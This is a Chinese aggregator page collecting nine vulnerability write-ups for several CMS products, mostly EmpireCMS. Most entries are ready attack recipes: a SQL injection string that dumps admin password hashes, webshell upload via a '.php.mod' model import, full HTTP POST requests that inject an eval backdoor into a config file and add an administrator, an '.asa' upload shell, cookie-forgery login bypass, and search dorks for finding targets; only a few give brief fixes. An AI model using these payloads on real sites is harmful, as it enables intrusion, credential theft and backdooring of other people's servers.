帝国CMS 留言本多字节漏洞漏洞预警(通用9篇)由网友“DECA”投稿提供,以下是小编收集整理的帝国CMS 留言本多字节漏洞漏洞预警,欢迎阅读与借鉴。
篇1:帝国CMS 留言本多字节漏洞漏洞预警
作者:深灰
找到使用帝国CMS的站,网址后面直接加:e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:\\
联系邮箱处写:,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from
phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
篇2:帝国CMS后台密码重置漏洞漏洞预警
5.0及以前版本:用phpmyadmin修改phome_enewsuser表,把password字段的值设为:e10adc3949ba59abbe56e057f20f883e
密码就是:123456
5.1版本:用phpmyadmin修改phome_enewsuser表里的记录:把password字段的值设为:“322d3fef02fc39251436cb4522d29a71”;把salt字段的值设为:“abc”.
密码就是:123456
篇3:帝国cms 7.0 后台拿shell漏洞预警
帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码,
进入后台~!
方法一:系统——数据表与系统模型——管理数据表 再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:
“导入系统模型”,可进入“LoadInM.php”页面,如图:
在本地新建一个文件,文本内容为
再命名为1.php.mod,导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件,
可以从导入系统模型源文件中查看到,如图:
方法二:
在本地新建一个info.php(任意php文件)其源码内容为
再重名名为info.php.mod,将此文件按照方法一导入系统模型
即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:
info.php.mod的源码
然后
系统——备份与恢复数据——执行SQL语句在执行SQL语句框中输入如下代码:
即可在网站根目录生成 z.php 菜刀连接即可~!
篇4:餐厅cms getshell漏洞漏洞预警
漏洞类型:代码执行
关键字:inurl:index.php?m=shopcar
问题出在/install/index.php文件,在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
<?phpif(file_exists(“../install.lock”)){header(“Location: ../”);//没有退出}//echo 'tst';exit;require_once(“init.php”);if(empty($_REQUEST['step']) || $_REQUEST['step']==1){
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
1、getshell(很危险)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1){$smarty->assign(“step”,1);$smarty->display(“index.html”);}elseif($_REQUEST['step']==2){$mysql_host=trim($_POST['mysql_host']);$mysql_user=trim($_POST['mysql_user']);$mysql_pwd=trim($_POST['mysql_pwd']);$mysql_db=trim($_POST['mysql_db']);$tblpre=trim($_POST['tblpre']);$domain==trim($_POST['domain']);$str=“<?php \r\n”;$str.='define(“MYSQL_HOST”,“'.$mysql_host.'”);'.“\r\n”;$str.='define(“MYSQL_USER”,“'.$mysql_user.'”);'.“\r\n”;$str.='define(“MYSQL_PWD”,“'.$mysql_pwd.'”);'.“\r\n”;$str.='define(“MYSQL_DB”,“'.$mysql_db.'”);'.“\r\n”;$str.='define(“MYSQL_CHARSET”,“GBK”);'.“\r\n”;$str.='define(“TABLE_PRE”,“'.$tblpre.'”);'.“\r\n”;$str.='define(“DOMAIN”,“'.$domain.'”);'.“\r\n”;$str.='define(“SKINS”,“default”);'.“\r\n”;$str.='?>';file_put_contents(“../config/config.inc.php”,$str);//将提交的数据写入php文件
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
-----------post----------
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
mysql_host=test“);@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
---------post----------
但是这个方法很危险,将导致网站无法运行,
2、直接添加管理员
elseif($_REQUEST['step']==5){if($_POST){ require_once(”../config/config.inc.php“);$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);mysql_select_db(MYSQL_DB,$link);mysql_query(”SET NAMES “.MYSQL_CHARSET );mysql_query(”SET sql_mode=''“);$adminname=trim($_POST['adminname']);$pwd1=trim($_POST['pwd1']);$pwd2=trim($_POST['pwd2']);if(empty($adminname)){echo ”“;exit;}if(($pwd1!=$pwd2) or empty($pwd1)){echo ”“;//这里也是没有退出}mysql_query(”insert into “.TABLE_PRE.”admin(adminname,password,isfounder) values('$adminname','“.umd5($pwd1).”',1)“);//直接可以插入一个管理员}
这样的话我们就可以直接插入一个管理员帐号,语句如下:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
篇5:帝国CMS(EmpireCMS)商品评分插件注入漏洞漏洞预警
由于对参数的变量未作初始化检测导致 pf\rate.php 和 pf\ratemovie.php 中变量 $id 存在注入风险,
$id=$_GET[''id''];$query=”SELECT infopfen,infopfennum FROM phome_ecms_shop WHERE id=$id“;$result=mysql_query($query);$v=$_GET[''v''];$id=$_GET[''id''];$query=”UPDATE phome_ecms_shop SET infopfen = infopfen + $v,infopfennum = infopfennum+1 WHERE id=$id“;$result=mysql_query($query);$query=”SELECT infopfen,infopfennum FROM phome_ecms_shop WHERE id=$id“;
$result=mysql_query($query);修复方案:
过滤
篇6:80After CMS V4 鸡肋上传漏洞漏洞预警
By:小A
官方网址:www.reaft.com/
Cms下载地址:www.reaft.com/html/1/200.html
界面做的还不错,搜索了一下好像用的人很少,开始,
首先看目录下 UpLoad.html 文件上传,调用了的是 UpLoad.asp。
UpLoad.asp:
文件上传
<%
dim upload
set upload = new AnUpLoad
upload.Exe = ”*“
upload.MaxSize = 4 * 1024 * 1024 '4M
upload.GetData
if upload.ErrorID>0 then
response.Write upload.Description
else
postMess(”images/operate_02.jpg“)
dim savpath
savepath = ”/upload/“&year(date())&”/“&month(date())&”/“
for each f in upload.files(-1)
dim file
set file = upload.files(f)
if not(file is nothing) then
if file.saveToFile(savepath,0,true) then
postMess(”images/operate_01.jpg“)
postValue = postValue&”“&savepath&file.filename&”|“
response.write (”“)
end if
end if
set file = nothing
next
end if
set upload = nothing
%>
然后在来看看:UpLoad_Class.vbs.asp。
UpLoad_Class.vbs.asp:
<%
'=========================================================
'类名: AnUpLoad(艾恩无组件上传类)
'=========================================================
C省略N行代码
Public Function GetWH()
'本函数代码参考网络
On Error Resume Next
mvarExtend = lcase(mvarExtend)
if instr(”|jpg|jpeg|bmp|png|gif|asa|“,”|“ & mvarExtend & ”|“)<=0 then exit function
Dim m_binItem
Set m_binItem =server.CreateObject(”ADODB.Stream“)
m_binItem.Mode = 3
m_binItem.Type = 1
m_binItem.Open
Dim Info
Set Info = server.CreateObject(”ADODB.Recordset“)
Info.Fields.Append ”value“, 205, -1
Info.Open
Info.AddNew
Info(”value“).AppendChunk (mvarValue)
m_binItem.Write (Info(”value“))
Info(”value“).AppendChunk (Null)
Info.Update
Info.Close
Set Info = Nothing
select case lcase(mvarExtend)
case ”jpg“,”jpeg“
m_binItem.Position=3
do while not m_binItem.EOS
do
intTemp = Ascb(m_binItem.Read(1))
loop while intTemp = 255 and not m_binItem.EOS
if intTemp < 192 or intTemp >195 then
m_binItem.read(Bin2Val(m_binItem.Read(2))-2)
else
Exit do
end if
do
intTemp = Ascb(m_binItem.Read(1))
loop while intTemp < 255 and not m_binItem.EOS
loop
m_binItem.Read(3)
mvarHeight = Bin2Val(m_binItem.Read(2))
mvarWidth = Bin2Val(m_binItem.Read(2))
case ”gif“
if Lcase(strFext)”gif“ then strFext=”gif“
m_binItem.Position=6
mvarWidth = BinVal2(m_binItem.Read(2))
mvarHeight = BinVal2(m_binItem.Read(2))
case ”png“
if Lcase(strFext)”png“ then strFext=”png“
m_binItem.Position=18
mvarWidth = Bin2Val(m_binItem.Read(2))
m_binItem.Read(2)
mvarHeight = Bin2Val(m_binItem.Read(2))
case ”bmp“
if Lcase(strFext)”bmp“ then strFext=”bmp“
m_binItem.Position=18
mvarWidth = BinVal2(m_binItem.Read(4))
mvarHeight = BinVal2(m_binItem.Read(4))
case ”asa“
if Lcase(strFext)”asa“ then strFext=”asa“
m_binItem.Position=18
mvarWidth = BinVal2(m_binItem.Read(2))
mvarHeight = BinVal2(m_binItem.Read(2))
end select
m_binItem.Close
If err then
mException=Err.Description
End If
End Function
看红色部分,其他就不解释了,
直接上传asa拿shell。
还有就是上传可能会提示登录,直接伪造session就可以通过了。(站长评论:什么、?伪造 Session???……我了个擦,这要是能伪造,那岂不、、、小A同学可能是看错了,当成了cookie ……)
验证代码在 admin.asp。
admin.asp:
<%
if session(”username“)=”“ and session(”password“)=”“ then
session(”Errortxt“)=”登录超时,请重新登陆“
response.Redirect(”login.asp“)
response.end
end if
%>
其他就不多说了!
重新编辑了一下,第一次发贴,格式不对,请见谅。
这个应该算是一个漏洞吧,不知道是不是作者故意加上的,在上传扩展名,检查那里,居然加了个asa,无意间发现的。
篇7:phpaa cms 0day及修复漏洞预警
Author:BlAck.Eagle
cookie欺骗
漏洞文件:/admin/global.php
/**
* 后台公用配置文件
*
* 用于后台应用初始化、后台权限验证 等
*/
require_once '../data/config.inc.php'; //系统初始化文件
require_once '../include/function.admin.php'; //后台公用函数库
//后台登陆验证
if (!isset($_COOKIE['userid']) empty($_COOKIE['userid'])){ //程序员只是判断了 userid是否存在,当然可以绕过,
phpaa cms 0day及修复漏洞预警
,
防范的话就是session验证或者生成随机数的cookie
setcookie(lastURL,get_url());//上次访问地址
header(”Location: login.php“);
}
?>
利用方式:通过cookie&&sqlinjection工具伪造userid=任意值。然后访问/admin/index.php即可进入后台
修复方案:
进行session验证或者生成随机数的cookie
篇8:骑士CMS SQL注入漏洞漏洞预警
骑士CMS人才系统,ajax_output.php页面参数过滤不严存在SQL注入漏洞,
漏洞文件:ajax_output.php
$category_id=trim($_GET['category_id']); if (($category_id+0)>0 && intval($category_id)==$category_id) //只用了if判断并没有执行
EXP:
127.0.0.1/74cms/ajax_output.php?act=index_jobscategory&category_id=4
漏洞修补:
$category_id=intval(trim($_GET['category_id']));
篇9:Alcassofts SOPHIA CMS SQL注入漏洞漏洞预警
Alcassoft's SOPHIA是一款国际化、功能强大的内容管理系统,Alcassoft's SOPHIA中的dsp_page.cfm文件存在sql注入漏洞,可能导致敏感信息泄露。
Title : Alcassoft's SOPHIA CMS Vulnerable to SQL Injection
Found by: p0pc0rn 24/02/2011
Web : www.alcassoft.com/site/
Dork : intext:”Powered by Alcassoft SOPHIA"
[+]poc:
~~~~~~~~~
site.com/path/dsp_page.cfm?pageid=[SQL]
★ Linux Kiss Server lks.c文件多个格式串处理漏洞
★ ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复
★ Podcast Generator多个模块文件包含和任意文件删除漏洞
【帝国CMS 留言本多字节漏洞漏洞预警(通用9篇)】相关文章:
Manhali v1.8本地文件包含缺陷及修复2022-08-19
WordPress博客常用的两个调用缩略图的方法2023-06-30
opera9.52使用ajax读取本地文件漏洞进一步利用漏洞预警2023-04-03
IOS LPD远程缓冲区溢出漏洞2022-04-30
Linux Kernel ELF文件跨区域映射本地拒绝服务漏洞2023-09-01
Bambook某频道SQL注射漏洞及修复2022-08-31
对PHP的CMS程序的一些建议和看法2022-09-17
数据相关的口号2022-08-20
Samba nmbdpackets.c NetBIOS 回复栈有溢出漏洞2022-04-30
脚本本地/远程文件包含/读取及文件名截断漏洞FUZZ工具详解漏洞预警2023-07-12